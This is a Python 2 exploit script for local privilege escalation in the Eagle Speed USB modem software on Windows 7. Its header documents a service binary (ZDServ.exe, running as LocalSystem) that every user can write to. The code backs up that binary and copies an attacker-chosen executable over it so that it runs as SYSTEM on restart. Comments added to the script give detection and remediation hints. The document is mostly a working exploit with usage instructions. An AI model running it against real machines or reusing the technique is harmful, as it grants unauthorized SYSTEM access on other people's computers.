#!/usr/bin/python -w
 # Title : Eagle Speed USB MODEM SOFTWARE Privilege Escalation
 # Date : 28/11/2016
 # Author : R-73eN
 # Tested on : Windows 7 ( Latest version of the software)
 # Software : N/A ( Comes with the USB Modem)
 # Vulnerability Description:
 # When the Eagle Speed software is installed, it registers a service named ZDServ.
 # The service's own permissions are set correctly and do not allow the binary path to be
 # reconfigured, but the binary at that path is writable by any authenticated user.
 #
 # C:\Users\lowpriv>sc qc zdserv
 # [SC] QueryServiceConfig SUCCESS
 #
 # SERVICE_NAME: zdserv
 #        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
 #        START_TYPE         : 2   AUTO_START
 #        ERROR_CONTROL      : 1   NORMAL
 #        BINARY_PATH_NAME   : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
 #        LOAD_ORDER_GROUP   :
 #        TAG                : 0
 #        DISPLAY_NAME       : ZDServ
 #        DEPENDENCIES       :
 #        SERVICE_START_NAME : LocalSystem
 #
 #
 #
 # C:\Users\lowpriv>icacls "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
 # C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe Everyone:(I)(F) <----------- Everyone has full control (F); the (I) flag marks the entry as inherited from the parent folder.
 #                                           NT AUTHORITY\SYSTEM:(I)(F)
 #                                           BUILTIN\Administrators:(I)(F)
 #                                          Victim-PC\lowpriv:(I)(F)
 #                                           BUILTIN\Users:(I)(RX)
 #
 # Successfully processed 1 files; Failed processing 0 files
 #
 # This exploit takes as a parameter an exe file that replaces ZDServ.exe; the replacement
 # then runs as LocalSystem (the SERVICE_START_NAME shown above) when the service or the
 # computer is restarted.
 #
 # Video : https://youtu.be/o59SD8gXzlU
 #
 import filecmp
 import os
 import sys
 # Proof of concept for a service binary with a weak file ACL: it renames the
 # original ZDServ.exe and copies a caller-supplied executable into its place.
 # The script does not restart the service itself; it only reports that the
 # copy happened.
 #
 # Defender view: every step below is ordinary file I/O by an unprivileged
 # user (a rename and a write inside C:\ProgramData\ZDSupport\ZDServ\), so it
 # shows up in file-integrity or file-write monitoring of service binaries,
 # not in service-configuration auditing. The icacls output in the header
 # shows the Everyone:(F) entry is inherited, so the fix belongs on the
 # folder's ACL; confirm on the affected host.

 # Service executable, as reported by BINARY_PATH_NAME in the `sc qc zdserv`
 # output in the header.
 # NOTE(review): this is a plain (non-raw) literal; the backslashes survive
 # only because \P and \Z are not recognised escape sequences.
 path = "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
 # Shell `move` command that renames the original binary to ZDServ.exe.bak in
 # the same directory.
 file_move = 'move "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe" "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe.bak"'
 # ASCII-art banner, built line by line and printed on every run.
 banner = "\n\n"
 banner +="  ___        __        ____                 _    _  \n"
 banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
 banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
 banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
 banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
 print banner
 # No argument given: print usage and the author's URL, then fall off the end.
 if(len(sys.argv) < 2):
     print '\n Usage : exploit.py program.exe\n'
     print 'https://infogen.al/'
 else:
     # First command-line argument: the local file that will be copied over
     # the service binary.
     program = sys.argv[1]
     if(not os.path.isfile(program)):
         print "[-] The parameter was incorrect, use a correct filename [-]"
         # Exits with status 0 even though this is an error path.
         exit(0)
     # A missing service binary is taken to mean the software is not installed.
     if(not os.path.isfile(path)):
         print "[-] File not found , propably service doesn't exists [-]\n"
     else:
         print "[+] Backing up the binary [+]"
         # The return status of os.system is ignored here and below; success
         # is judged only by the file comparison at the end.
         os.system(file_move)
         print "[+] Copying the payload [+]"
         os.system("copy " + program + " " + path)
         # filecmp.cmp defaults to shallow=True, so files whose stat
         # signatures (type, size, mtime) match are reported equal without
         # their contents being read.
         if(filecmp.cmp(program,path)):
             print "[+] Exploit successfull, wait for service to restart or reboot [+]"
         else:
             print "[-] Exploit failed [-]"
 
 